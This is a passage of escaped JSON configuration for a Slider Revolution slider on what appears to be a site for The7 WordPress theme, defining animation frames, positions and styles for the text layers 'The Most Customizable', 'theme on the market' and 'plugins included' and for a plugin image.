To\",\"transform\":{\"x\":{\"d\":{\"v\":\"inherit\"},\"n\":{\"v\":\"inherit\"},\"t\":{\"v\":\"inherit\"},\"m\":{\"v\":\"inherit\"}},\"y\":{\"d\":{\"v\":\"inherit\"},\"n\":{\"v\":\"inherit\"},\"t\":{\"v\":\"inherit\"},\"m\":{\"v\":\"inherit\"}},\"z\":\"inherit\",\"scaleX\":\"inherit\",\"scaleY\":\"inherit\",\"opacity\":\"0\",\"rotationX\":\"inherit\",\"rotationY\":\"inherit\",\"rotationZ\":\"inherit\",\"skewX\":\"inherit\",\"skewY\":\"inherit\",\"transformPerspective\":\"600\"},\"color\":{\"color\":\"transparent\"},\"timeline\":{\"speed\":310,\"start\":9000,\"startRelative\":5900,\"endWithSlide\":true},\"chars\":{\"delay\":\"10\"},\"words\":{\"delay\":\"10\"},\"lines\":{\"delay\":\"10\"}}},\"loop\":{\"yoyo_move\":true,\"speed\":4000}},\"idle\":{\"color\":{\"d\":{\"v\":\"rgba(255, 255, 255, 1)\",\"e\":true},\"n\":{\"v\":\"rgba(255, 255, 255, 1)\"},\"t\":{\"v\":\"rgba(255, 255, 255, 1)\",\"e\":true},\"m\":{\"v\":\"rgba(255, 255, 255, 1)\",\"e\":true}},\"margin\":{\"d\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"n\":{\"v\":[\"0\",\"0\",\"0\",\"0\"]},\"t\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"m\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true}},\"padding\":{\"d\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"n\":{\"v\":[\"0\",\"0\",\"0\",\"0\"]},\"t\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"m\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true}},\"autolinebreak\":false,\"fontFamily\":\"Open Sans\",\"fontSize\":{\"d\":{\"e\":true},\"t\":{\"e\":true},\"m\":{\"e\":true}},\"fontWeight\":{\"d\":{\"e\":true},\"t\":{\"e\":true},\"m\":{\"e\":true}},\"letterSpacing\":{\"d\":{\"e\":true}},\"lineHeight\":{\"d\":{\"v\":\"22\",\"e\":true},\"n\":{\"v\":\"22\"},\"t\":{\"v\":\"22\",\"e\":true},\"m\":{\"v\":\"22\",\"e\":true}},\"textAlign\":{\"d\":{\"v\":\"inherit\",\"e\":true},\"n\":{\"v\":\"inherit\"},\"t\":{\"v\":\"inherit\",\"e\":true},\"m\":{\"v\":\"inherit\",\"e\":true}},\"backgroundColor\":\"transparent\",\"borderRadius\":{\"v\":[\"0\",\"0\",\"0\",\"0\"]},\"borderWidth\":[\"0\",\"0\",\"0\",\"0\"],\"whiteSpace\":{\"d\":{\"e\":true},\"t\":{\"e\":true},\"m\":{\"e\":true}},\"svg\":{\"color\":{\"d\":{\"v\":\"rgba(255, 255, 255, 1)\",\"e\":true},\"n\":{\"v\":\"rgba(255, 255, 255, 1)\"},\"t\":{\"v\":\"rgba(255, 255, 255, 1)\",\"e\":true},\"m\":{\"v\":\"rgba(255, 255, 255, 1)\",\"e\":true}}}},\"hover\":{\"color\":\"rgba(255, 255, 255, 1)\",\"borderRadius\":{\"v\":[\"0\",\"0\",\"0\",\"0\"]},\"borderWidth\":[\"0\",\"0\",\"0\",\"0\"],\"originX\":50,\"originY\":50,\"speed\":\"0\",\"svg\":{\"color\":\"rgba(255, 255, 255, 1)\"}},\"actions\":{\"animationoverwrite\":\"wait\",\"triggerMemory\":\"keep\"},\"type\":\"group\",\"version\":\"6.6.0\"},\"3\":{\"text\":\"The Most Customizable\",\"alias\":\"The most\",\"uid\":3,\"size\":{\"width\":{\"d\":{\"e\":true}},\"height\":{\"d\":{\"e\":true}}},\"position\":{\"x\":{\"d\":{\"e\":true}},\"y\":{\"d\":{\"v\":\"10px\",\"e\":true},\"n\":{\"v\":\"10px\"},\"t\":{\"v\":\"10px\"},\"m\":{\"v\":\"10px\"}},\"horizontal\":{\"d\":{\"v\":\"center\",\"e\":true},\"n\":{\"v\":\"center\"},\"t\":{\"v\":\"center\"},\"m\":{\"v\":\"center\"}},\"vertical\":{\"d\":{\"v\":\"middle\",\"e\":true},\"n\":{\"v\":\"middle\"},\"t\":{\"v\":\"middle\"},\"m\":{\"v\":\"middle\"}},\"zIndex\":13,\"position\":\"absolute\"},\"attributes\":{\"tabIndex\":\"\"},\"behavior\":{\"intelligentInherit\":false},\"group\":{\"puid\":11,\"groupOrder\":13,\"columnbreakat\":\"mobile\"},\"timeline\":{\"frameOrder\":[{\"id\":\"frame_1\",\"start\":110},{\"id\":\"frame_999\",\"start\":9000}],\"frames\":{\"frame_0\":{\"alias\":\"Anim From\",\"transform\":{\"x\":{\"d\":{\"v\":\"inherit\"},\"n\":{\"v\":\"inherit\"},\"t\":{\"v\":\"inherit\"},\"m\":{\"v\":\"inherit\"}},\"y\":{\"d\":{\"v\":\"inherit\"},\"n\":{\"v\":\"inherit\"},\"t\":{\"v\":\"inherit\"},\"m\":{\"v\":\"inherit\"}},\"z\":0,\"scaleX\":\"1\",\"scaleY\":\"1\",\"opacity\":\"0\",\"rotationX\":0,\"rotationY\":0,\"rotationZ\":0,\"skewX\":\"0\",\"skewY\":\"0\",\"transformPerspective\":\"600\"},\"color\":{\"color\":\"transparent\"},\"timeline\":{\"speed\":310,\"start\":110,\"startRelative\":10},\"chars\":{\"delay\":\"10\"},\"words\":{\"delay\":\"10\"},\"lines\":{\"delay\":\"10\"}},\"frame_1\":{\"alias\":\"Anim To\",\"transform\":{\"x\":{\"d\":{\"v\":0},\"n\":{\"v\":0},\"t\":{\"v\":0},\"m\":{\"v\":0}},\"y\":{\"d\":{\"v\":0},\"n\":{\"v\":0},\"t\":{\"v\":0},\"m\":{\"v\":0}},\"z\":0,\"scaleX\":\"1\",\"scaleY\":\"1\",\"opacity\":\"1\",\"rotationX\":0,\"rotationY\":0,\"rotationZ\":0,\"skewX\":\"0\",\"skewY\":\"0\",\"transformPerspective\":\"600\"},\"timeline\":{\"speed\":310,\"start\":110,\"startRelative\":10},\"chars\":{\"delay\":\"10\"},\"words\":{\"delay\":\"10\"},\"lines\":{\"delay\":\"10\"}},\"frame_999\":{\"alias\":\"Anim To\",\"transform\":{\"x\":{\"d\":{\"v\":\"inherit\"},\"n\":{\"v\":\"inherit\"},\"t\":{\"v\":\"inherit\"},\"m\":{\"v\":\"inherit\"}},\"y\":{\"d\":{\"v\":\"inherit\"},\"n\":{\"v\":\"inherit\"},\"t\":{\"v\":\"inherit\"},\"m\":{\"v\":\"inherit\"}},\"z\":\"inherit\",\"scaleX\":\"inherit\",\"scaleY\":\"inherit\",\"opacity\":\"0\",\"rotationX\":\"inherit\",\"rotationY\":\"inherit\",\"rotationZ\":\"inherit\",\"skewX\":\"inherit\",\"skewY\":\"inherit\",\"transformPerspective\":\"600\"},\"color\":{\"color\":\"transparent\"},\"timeline\":{\"speed\":310,\"start\":9000,\"startRelative\":8580,\"endWithSlide\":true},\"chars\":{\"delay\":\"10\"},\"words\":{\"delay\":\"10\"},\"lines\":{\"delay\":\"10\"}}},\"loop\":{\"yoyo_move\":true,\"speed\":4000}},\"idle\":{\"color\":{\"d\":{\"v\":\"rgba(255, 255, 255, 1)\",\"e\":true},\"n\":{\"v\":\"rgba(255, 255, 255, 1)\"},\"t\":{\"v\":\"rgba(255, 255, 255, 1)\"},\"m\":{\"v\":\"rgba(255, 255, 255, 1)\"}},\"margin\":{\"d\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"n\":{\"v\":[\"0\",\"0\",\"0\",\"0\"]},\"t\":{\"v\":[\"0\",\"0\",\"0\",\"0\"]},\"m\":{\"v\":[\"0\",\"0\",\"0\",\"0\"]}},\"padding\":{\"d\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"n\":{\"v\":[\"0\",\"0\",\"0\",\"0\"]},\"t\":{\"v\":[\"0\",\"0\",\"0\",\"0\"]},\"m\":{\"v\":[\"0\",\"0\",\"0\",\"0\"]}},\"autolinebreak\":false,\"fontSize\":{\"d\":{\"v\":\"70px\",\"e\":true},\"n\":{\"v\":\"70px\"},\"t\":{\"v\":\"70px\"},\"m\":{\"v\":\"70px\"}},\"fontWeight\":{\"d\":{\"v\":\"500\",\"e\":true},\"n\":{\"v\":\"500\"},\"t\":{\"v\":\"500\"},\"m\":{\"v\":\"500\"}},\"letterSpacing\":{\"d\":{\"e\":true}},\"lineHeight\":{\"d\":{\"v\":\"76px\",\"e\":true},\"n\":{\"v\":\"76px\"},\"t\":{\"v\":\"76px\"},\"m\":{\"v\":\"76px\"}},\"textAlign\":{\"d\":{\"v\":\"inherit\",\"e\":true},\"n\":{\"v\":\"inherit\"},\"t\":{\"v\":\"inherit\"},\"m\":{\"v\":\"inherit\"}},\"backgroundColor\":\"transparent\",\"borderRadius\":{\"v\":[\"0\",\"0\",\"0\",\"0\"]},\"borderWidth\":[\"0\",\"0\",\"0\",\"0\"],\"whiteSpace\":{\"d\":{\"e\":true}},\"svg\":{\"color\":{\"d\":{\"v\":\"rgba(255, 255, 255, 1)\",\"e\":true},\"n\":{\"v\":\"rgba(255, 255, 255, 1)\"},\"t\":{\"v\":\"rgba(255, 255, 255, 1)\"},\"m\":{\"v\":\"rgba(255, 255, 255, 1)\"}}}},\"hover\":{\"color\":\"rgba(0, 0, 0, 1)\",\"borderRadius\":{\"v\":[\"0px\",\"0px\",\"0px\",\"0px\"],\"u\":\"px\"},\"borderWidth\":[\"0px\",\"0px\",\"0px\",\"0px\"],\"originX\":50,\"originY\":50,\"speed\":\"0\",\"svg\":{\"color\":\"rgba(0, 0, 0, 1)\"}},\"actions\":{\"animationoverwrite\":\"wait\",\"triggerMemory\":\"keep\"},\"type\":\"text\",\"version\":\"6.6.0\"},\"6\":{\"text\":\"theme on the market\",\"alias\":\"Theme on...\",\"uid\":6,\"size\":{\"width\":{\"d\":{\"e\":true}},\"height\":{\"d\":{\"e\":true}}},\"position\":{\"x\":{\"d\":{\"e\":true}},\"y\":{\"d\":{\"v\":\"80px\",\"e\":true},\"n\":{\"v\":\"80px\"},\"t\":{\"v\":\"80px\"},\"m\":{\"v\":\"80px\"}},\"horizontal\":{\"d\":{\"v\":\"center\",\"e\":true},\"n\":{\"v\":\"center\"},\"t\":{\"v\":\"center\"},\"m\":{\"v\":\"center\"}},\"vertical\":{\"d\":{\"v\":\"middle\",\"e\":true},\"n\":{\"v\":\"middle\"},\"t\":{\"v\":\"middle\"},\"m\":{\"v\":\"middle\"}},\"zIndex\":14,\"position\":\"absolute\"},\"attributes\":{\"tabIndex\":\"\"},\"behavior\":{\"intelligentInherit\":false},\"group\":{\"puid\":11,\"groupOrder\":14,\"columnbreakat\":\"mobile\"},\"timeline\":{\"frameOrder\":[{\"id\":\"frame_1\",\"start\":110},{\"id\":\"frame_999\",\"start\":9000}],\"frames\":{\"frame_0\":{\"alias\":\"Anim From\",\"transform\":{\"x\":{\"d\":{\"v\":\"inherit\"},\"n\":{\"v\":\"inherit\"},\"t\":{\"v\":\"inherit\"},\"m\":{\"v\":\"inherit\"}},\"y\":{\"d\":{\"v\":\"inherit\"},\"n\":{\"v\":\"inherit\"},\"t\":{\"v\":\"inherit\"},\"m\":{\"v\":\"inherit\"}},\"z\":0,\"scaleX\":\"1\",\"scaleY\":\"1\",\"opacity\":\"0\",\"rotationX\":0,\"rotationY\":0,\"rotationZ\":0,\"skewX\":\"0\",\"skewY\":\"0\",\"transformPerspective\":\"600\"},\"color\":{\"color\":\"transparent\"},\"timeline\":{\"speed\":310,\"start\":110,\"startRelative\":10},\"chars\":{\"delay\":\"10\"},\"words\":{\"delay\":\"10\"},\"lines\":{\"delay\":\"10\"}},\"frame_1\":{\"alias\":\"Anim To\",\"transform\":{\"x\":{\"d\":{\"v\":0},\"n\":{\"v\":0},\"t\":{\"v\":0},\"m\":{\"v\":0}},\"y\":{\"d\":{\"v\":0},\"n\":{\"v\":0},\"t\":{\"v\":0},\"m\":{\"v\":0}},\"z\":0,\"scaleX\":\"1\",\"scaleY\":\"1\",\"opacity\":\"1\",\"rotationX\":0,\"rotationY\":0,\"rotationZ\":0,\"skewX\":\"0\",\"skewY\":\"0\",\"transformPerspective\":\"600\"},\"timeline\":{\"speed\":310,\"start\":110,\"startRelative\":10},\"chars\":{\"delay\":\"10\"},\"words\":{\"delay\":\"10\"},\"lines\":{\"delay\":\"10\"}},\"frame_999\":{\"alias\":\"Anim To\",\"transform\":{\"x\":{\"d\":{\"v\":\"inherit\"},\"n\":{\"v\":\"inherit\"},\"t\":{\"v\":\"inherit\"},\"m\":{\"v\":\"inherit\"}},\"y\":{\"d\":{\"v\":\"inherit\"},\"n\":{\"v\":\"inherit\"},\"t\":{\"v\":\"inherit\"},\"m\":{\"v\":\"inherit\"}},\"z\":\"inherit\",\"scaleX\":\"inherit\",\"scaleY\":\"inherit\",\"opacity\":\"0\",\"rotationX\":\"inherit\",\"rotationY\":\"inherit\",\"rotationZ\":\"inherit\",\"skewX\":\"inherit\",\"skewY\":\"inherit\",\"transformPerspective\":\"600\"},\"color\":{\"color\":\"transparent\"},\"timeline\":{\"speed\":310,\"start\":9000,\"startRelative\":8580,\"endWithSlide\":true},\"chars\":{\"delay\":\"10\"},\"words\":{\"delay\":\"10\"},\"lines\":{\"delay\":\"10\"}}},\"loop\":{\"yoyo_move\":true,\"speed\":4000}},\"idle\":{\"color\":{\"d\":{\"v\":\"rgba(255, 255, 255, 1)\",\"e\":true},\"n\":{\"v\":\"rgba(255, 255, 255, 1)\"},\"t\":{\"v\":\"rgba(255, 255, 255, 1)\"},\"m\":{\"v\":\"rgba(255, 255, 255, 1)\"}},\"margin\":{\"d\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"n\":{\"v\":[\"0\",\"0\",\"0\",\"0\"]},\"t\":{\"v\":[\"0\",\"0\",\"0\",\"0\"]},\"m\":{\"v\":[\"0\",\"0\",\"0\",\"0\"]}},\"padding\":{\"d\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"n\":{\"v\":[\"0\",\"0\",\"0\",\"0\"]},\"t\":{\"v\":[\"0\",\"0\",\"0\",\"0\"]},\"m\":{\"v\":[\"0\",\"0\",\"0\",\"0\"]}},\"autolinebreak\":false,\"fontSize\":{\"d\":{\"v\":\"44px\",\"e\":true},\"n\":{\"v\":\"44px\"},\"t\":{\"v\":\"44px\"},\"m\":{\"v\":\"44px\"}},\"fontWeight\":{\"d\":{\"v\":\"500\",\"e\":true},\"n\":{\"v\":\"500\"},\"t\":{\"v\":\"500\"},\"m\":{\"v\":\"500\"}},\"letterSpacing\":{\"d\":{\"e\":true}},\"lineHeight\":{\"d\":{\"v\":\"50px\",\"e\":true},\"n\":{\"v\":\"50px\"},\"t\":{\"v\":\"50px\"},\"m\":{\"v\":\"50px\"}},\"textAlign\":{\"d\":{\"v\":\"inherit\",\"e\":true},\"n\":{\"v\":\"inherit\"},\"t\":{\"v\":\"inherit\"},\"m\":{\"v\":\"inherit\"}},\"backgroundColor\":\"transparent\",\"borderRadius\":{\"v\":[\"0\",\"0\",\"0\",\"0\"]},\"borderWidth\":[\"0\",\"0\",\"0\",\"0\"],\"whiteSpace\":{\"d\":{\"e\":true}},\"svg\":{\"color\":{\"d\":{\"v\":\"rgba(255, 255, 255, 1)\",\"e\":true},\"n\":{\"v\":\"rgba(255, 255, 255, 1)\"},\"t\":{\"v\":\"rgba(255, 255, 255, 1)\"},\"m\":{\"v\":\"rgba(255, 255, 255, 1)\"}}}},\"hover\":{\"color\":\"rgba(0, 0, 0, 1)\",\"borderRadius\":{\"v\":[\"0px\",\"0px\",\"0px\",\"0px\"],\"u\":\"px\"},\"borderWidth\":[\"0px\",\"0px\",\"0px\",\"0px\"],\"originX\":50,\"originY\":50,\"speed\":\"0\",\"svg\":{\"color\":\"rgba(0, 0, 0, 1)\"}},\"actions\":{\"animationoverwrite\":\"wait\",\"triggerMemory\":\"keep\"},\"type\":\"text\",\"version\":\"6.6.0\"},\"8\":{\"text\":\"plugins included\",\"alias\":\"Plugins included\",\"uid\":8,\"size\":{\"width\":{\"d\":{\"e\":true}},\"height\":{\"d\":{\"e\":true}}},\"position\":{\"x\":{\"d\":{\"v\":\"16px\",\"e\":true},\"n\":{\"v\":\"16px\"},\"t\":{\"v\":\"16px\"},\"m\":{\"v\":\"16px\"}},\"y\":{\"d\":{\"v\":\"186px\",\"e\":true},\"n\":{\"v\":\"186px\"},\"t\":{\"v\":\"186px\"},\"m\":{\"v\":\"186px\"}},\"horizontal\":{\"d\":{\"v\":\"center\",\"e\":true},\"n\":{\"v\":\"center\"},\"t\":{\"v\":\"center\"},\"m\":{\"v\":\"center\"}},\"vertical\":{\"d\":{\"v\":\"middle\",\"e\":true},\"n\":{\"v\":\"middle\"},\"t\":{\"v\":\"middle\"},\"m\":{\"v\":\"middle\"}},\"zIndex\":15,\"position\":\"absolute\"},\"attributes\":{\"tabIndex\":\"\"},\"behavior\":{\"intelligentInherit\":false},\"group\":{\"puid\":11,\"groupOrder\":15,\"columnbreakat\":\"mobile\"},\"timeline\":{\"frameOrder\":[{\"id\":\"frame_1\",\"start\":110},{\"id\":\"frame_999\",\"start\":9000}],\"frames\":{\"frame_0\":{\"alias\":\"Anim From\",\"transform\":{\"x\":{\"d\":{\"v\":\"inherit\"},\"n\":{\"v\":\"inherit\"},\"t\":{\"v\":\"inherit\"},\"m\":{\"v\":\"inherit\"}},\"y\":{\"d\":{\"v\":\"inherit\"},\"n\":{\"v\":\"inherit\"},\"t\":{\"v\":\"inherit\"},\"m\":{\"v\":\"inherit\"}},\"z\":0,\"scaleX\":\"1\",\"scaleY\":\"1\",\"opacity\":\"0\",\"rotationX\":0,\"rotationY\":0,\"rotationZ\":0,\"skewX\":\"0\",\"skewY\":\"0\",\"transformPerspective\":\"600\"},\"color\":{\"color\":\"transparent\"},\"timeline\":{\"speed\":310,\"start\":110,\"startRelative\":10},\"chars\":{\"delay\":\"10\"},\"words\":{\"delay\":\"10\"},\"lines\":{\"delay\":\"10\"}},\"frame_1\":{\"alias\":\"Anim To\",\"transform\":{\"x\":{\"d\":{\"v\":0},\"n\":{\"v\":0},\"t\":{\"v\":0},\"m\":{\"v\":0}},\"y\":{\"d\":{\"v\":0},\"n\":{\"v\":0},\"t\":{\"v\":0},\"m\":{\"v\":0}},\"z\":0,\"scaleX\":\"1\",\"scaleY\":\"1\",\"opacity\":\"1\",\"rotationX\":0,\"rotationY\":0,\"rotationZ\":0,\"skewX\":\"0\",\"skewY\":\"0\",\"transformPerspective\":\"600\"},\"timeline\":{\"speed\":310,\"start\":110,\"startRelative\":10},\"chars\":{\"delay\":\"10\"},\"words\":{\"delay\":\"10\"},\"lines\":{\"delay\":\"10\"}},\"frame_999\":{\"alias\":\"Anim To\",\"transform\":{\"x\":{\"d\":{\"v\":\"inherit\"},\"n\":{\"v\":\"inherit\"},\"t\":{\"v\":\"inherit\"},\"m\":{\"v\":\"inherit\"}},\"y\":{\"d\":{\"v\":\"inherit\"},\"n\":{\"v\":\"inherit\"},\"t\":{\"v\":\"inherit\"},\"m\":{\"v\":\"inherit\"}},\"z\":\"inherit\",\"scaleX\":\"inherit\",\"scaleY\":\"inherit\",\"opacity\":\"0\",\"rotationX\":\"inherit\",\"rotationY\":\"inherit\",\"rotationZ\":\"inherit\",\"skewX\":\"inherit\",\"skewY\":\"inherit\",\"transformPerspective\":\"600\"},\"color\":{\"color\":\"transparent\"},\"timeline\":{\"speed\":310,\"start\":9000,\"startRelative\":8580,\"endWithSlide\":true},\"chars\":{\"delay\":\"10\"},\"words\":{\"delay\":\"10\"},\"lines\":{\"delay\":\"10\"}}},\"loop\":{\"yoyo_move\":true,\"speed\":4000}},\"idle\":{\"color\":{\"d\":{\"v\":\"rgba(255, 255, 255, 1)\",\"e\":true},\"n\":{\"v\":\"rgba(255, 255, 255, 1)\"},\"t\":{\"v\":\"rgba(255, 255, 255, 1)\"},\"m\":{\"v\":\"rgba(255, 255, 255, 1)\"}},\"margin\":{\"d\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"n\":{\"v\":[\"0\",\"0\",\"0\",\"0\"]},\"t\":{\"v\":[\"0\",\"0\",\"0\",\"0\"]},\"m\":{\"v\":[\"0\",\"0\",\"0\",\"0\"]}},\"padding\":{\"d\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"n\":{\"v\":[\"0\",\"0\",\"0\",\"0\"]},\"t\":{\"v\":[\"0\",\"0\",\"0\",\"0\"]},\"m\":{\"v\":[\"0\",\"0\",\"0\",\"0\"]}},\"autolinebreak\":false,\"fontSize\":{\"d\":{\"v\":\"20px\",\"e\":true},\"n\":{\"v\":\"20px\"},\"t\":{\"v\":\"20px\"},\"m\":{\"v\":\"20px\"}},\"fontWeight\":{\"d\":{\"v\":\"700\",\"e\":true},\"n\":{\"v\":\"700\"},\"t\":{\"v\":\"700\"},\"m\":{\"v\":\"700\"}},\"letterSpacing\":{\"d\":{\"e\":true}},\"lineHeight\":{\"d\":{\"v\":\"20px\",\"e\":true},\"n\":{\"v\":\"20px\"},\"t\":{\"v\":\"20px\"},\"m\":{\"v\":\"20px\"}},\"textAlign\":{\"d\":{\"v\":\"inherit\",\"e\":true},\"n\":{\"v\":\"inherit\"},\"t\":{\"v\":\"inherit\"},\"m\":{\"v\":\"inherit\"}},\"backgroundColor\":\"transparent\",\"borderRadius\":{\"v\":[\"0\",\"0\",\"0\",\"0\"]},\"borderWidth\":[\"0\",\"0\",\"0\",\"0\"],\"whiteSpace\":{\"d\":{\"e\":true}},\"svg\":{\"color\":{\"d\":{\"v\":\"rgba(255, 255, 255, 1)\",\"e\":true},\"n\":{\"v\":\"rgba(255, 255, 255, 1)\"},\"t\":{\"v\":\"rgba(255, 255, 255, 1)\"},\"m\":{\"v\":\"rgba(255, 255, 255, 1)\"}}}},\"hover\":{\"color\":\"rgba(0, 0, 0, 1)\",\"borderRadius\":{\"v\":[\"0px\",\"0px\",\"0px\",\"0px\"],\"u\":\"px\"},\"borderWidth\":[\"0px\",\"0px\",\"0px\",\"0px\"],\"originX\":50,\"originY\":50,\"speed\":\"0\",\"svg\":{\"color\":\"rgba(0, 0, 0, 1)\"}},\"actions\":{\"animationoverwrite\":\"wait\",\"triggerMemory\":\"keep\"},\"type\":\"text\",\"version\":\"6.6.0\"},\"24\":{\"text\":\"Image 7\",\"alias\":\"Pl01\",\"uid\":24,\"media\":{\"imageUrl\":\"https:\\/\\/the7.io\\/wp-content\\/uploads\\/sites\\/84\\/2019\\/08\\/7e-plugin.png\"},\"size\":{\"width\":{\"d\":{\"v\":\"72px\",\"e\":true},\"n\":{\"v\":\"72px\"},\"t\":{\"v\":\"72px\"},\"m\":{\"v\":\"72px\"}},\"height\":{\"d\":{\"v\":72,\"e\":true},\"n\":{\"v\":72},\"t\":{\"v\":72},\"m\":{\"v\":72}},\"originalWidth\":72,\"originalHeight\":72,\"aspectRatio\":{\"d\":{\"v\":1},\"n\":{\"v\":1},\"t\":{\"v\":1},\"m\":{\"v\":1}}},\"position\":{\"x\":{\"d\":{\"v\":\"-138px\",\"e\":true},\"n\":{\"v\":\"-138px\"},\"t\":{\"v\":\"-138px\"},\"m\":{\"v\":\"-138px\"}},\"y\":{\"d\":{\"v\":\"260px\",\"e\":true},\"n\":{\"v\":\"260px\"},\"t\":{\"v\":\"260px\"},\"m\":{\"v\":\"260px\"}},\"horizontal\":{\"d\":{\"v\":\"center\",\"e\":true},\"n\":{\"v\":\"center\"},\"t\":{\"v\":\"center\"},\"m\":{\"v\":\"center\"}},\"vertical\":{\"d\":{\"v\":\"middle\",\"e\":true},\"n\":{\"v\":\"middle\"},\"t\":{\"v\":\"middle\"},\"m\":{\"v\":\"middle\"}},\"zIndex\":16,\"position\":\"absolute\"},\"attributes\":{\"tabIndex\":\"\"},\"behavior\":{\"intelligentInherit\":false},\"group\":{\"puid\":11,\"groupOrder\":16,\"columnbreakat\":\"mobile\"},\"timeline\":{\"frameOrder\":[{\"id\":\"frame_1\",\"start\":110},{\"id\":\"frame_999\",\"start\":9000}],\"frames\":{\"frame_0\":{\"alias\":\"Anim From\",\"transform\":{\"x\":{\"d\":{\"v\":\"inherit\"},\"n\":{\"v\":\"inherit\"},\"t\":{\"v\":\"inherit\"},\"m\":{\"v\":\"inherit\"}},\"y\":{\"d\":{\"v\":\"inherit\"},\"n\":{\"v\":\"inherit\"},\"t\":{\"v\":\"inherit\"},\"m\":{\"v\":\"inherit\"}},\"z\":0,\"scaleX\":\"1\",\"scaleY\":\"1\",\"opacity\":\"0\",\"rotationX\":0,\"rotationY\":0,\"rotationZ\":0,\"skewX\":\"0\",\"skewY\":\"0\",\"transformPerspective\":\"600\"},\"color\":{\"color\":\"transparent\"},\"timeline\":{\"speed\":310,\"start\":110,\"startRelative\":10},\"chars\":{\"delay\":\"10\"},\"words\":{\"delay\":\"10\"},\"lines\":{\"delay\":\"10\"}},\"frame_1\":{\"alias\":\"Anim To\",\"transform\":{\"x\":{\"d\":{\"v\":0},\"n\":{\"v\":0},\"t\":{\"v\":0},\"m\":{\"v\":0}},\"y\":{\"d\":{\"v\":0},\"n\":{\"v\":0},\"t\":{\"v\":0},\"m\":{\"v\":0}},\"z\":0,\"scaleX\":\"1\",\"scaleY\":\"1\",\"opacity\":\"1\",\"rotationX\":0,\"rotationY\":0,\"rotationZ\":0,\"skewX\":\"0\",\"skewY\":\"0\",\"transformPerspective\":\"600\"},\"timeline\":{\"speed\":310,\"start\":110,\"startRelative\":10},\"chars\":{\"delay\":\"10\"},\"words\":{\"delay\":\"10\"},\"lines\":{\"delay\":\"10\"}},\"frame_999\":{\"alias\":\"Anim To\",\"transform\":{\"x\":{\"d\":{\"v\":\"inherit\"},\"n\":{\"v\":\"inherit\"},\"t\":{\"v\":\"inherit\"},\"m\":{\"v\":\"inherit\"}},\"y\":{\"d\":{\"v\":\"inherit\"},\"n\":{\"v\":\"inherit\"},\"t\":{\"v\":\"inherit\"},\"m\":{\"v\":\"inherit\"}},\"z\":\"inherit\",\"scaleX\":\"inherit\",\"scaleY\":\"inherit\",\"opacity\":\"0\",\"rotationX\":\"inherit\",\"rotationY\":\"inherit\",\"rotationZ\":\"inherit\",\"skewX\":\"inherit\",\"skewY\":\"inherit\",\"transformPerspective\":\"600\"},\"color\":{\"color\":\"transparent\"},\"timeline\":{\"speed\":310,\"start\":9000,\"startRelative\":8580,\"endWithSlide\":true},\"chars\":{\"delay\":\"10\"},\"words\":{\"delay\":\"10\"},\"lines\":{\"delay\":\"10\"}}},\"loop\":{\"yoyo_move\":true,\"speed\":4000}},\"idle\":{\"color\":{\"d\":{\"v\":\"rgba(255, 255, 255, 1)\",\"e\":true},\"n\":{\"v\":\"rgba(255, 255, 255, 1)\"},\"t\":{\"v\":\"rgba(255, 255, 255, 1)\"},\"m\":{\"v\":\"rgba(255, 255, 255, 1)\"}},\"margin\":{\"d\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"n\":{\"v\":[\"0\",\"0\",\"0\",\"0\"]},\"t\":{\"v\":[\"0\",\"0\",\"0\",\"0\"]},\"m\":{\"v\":[\"0\",\"0\",\"0\",\"0\"]}},\"padding\":{\"d\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"n\":{\"v\":[\"0\",\"0\",\"0\",\"0\"]},\"t\":{\"v\":[\"0\",\"0\",\"0\",\"0\"]},\"m\":{\"v\":[\"0\",\"0\",\"0\",\"0\"]}},\"autolinebreak\":false,\"fontFamily\":\"Open Sans\",\"fontSize\":{\"d\":{\"e\":true}},\"fontWeight\":{\"d\":{\"e\":true}},\"letterSpacing\":{\"d\":{\"e\":true}},\"lineHeight\":{\"d\":{\"v\":\"22\",\"e\":true},\"n\":{\"v\":\"22\"},\"t\":{\"v\":\"22\"},\"m\":{\"v\":\"22\"}},\"textAlign\":{\"d\":{\"v\":\"inherit\",\"e\":true},\"n\":{\"v\":\"inherit\"},\"t\":{\"v\":\"inherit\"},\"m\":{\"v\":\"inherit\"}},\"backgroundColor\":\"transparent\",\"borderRadius\":{\"v\":[\"0\",\"0\",\"0\",\"0\"]},\"borderWidth\":[\"0\",\"0\",\"0\",\"0\"],\"whiteSpace\":{\"d\":{\"e\":true}},\"svg\":{\"color\":{\"d\":{\"v\":\"rgba(255, 255, 255, 1)\",\"e\":true},\"n\":{\"v\":\"rgba(255, 255, 255, 1)\"},\"t\":{\"v\":\"rgba(255, 255, 255, 1)\"},\"m\":{\"v\":\"rgba(255, 255, 255, 1)\"}}}},\"hover\":{\"color\":\"rgba(255, 255, 255, 1)\",\"borderRadius\":{\"v\":[\"0\",\"0\",\"0\",\"0\"]},\"borderWidth\":[\"0\",\"0\",\"0\",\"0\"],\"originX\":50,\"originY\":50,\"speed\":\"0\",\"svg\":{\"color\":\"rgba(255, 255, 255, 1)\"}},\"actions\":{\"animationoverwrite\":\"wait\",\"triggerMemory\":\"keep\"},\"type\":\"image\",\"version\":\"6.6.0\"},\"25\":{\"text\":\"Image 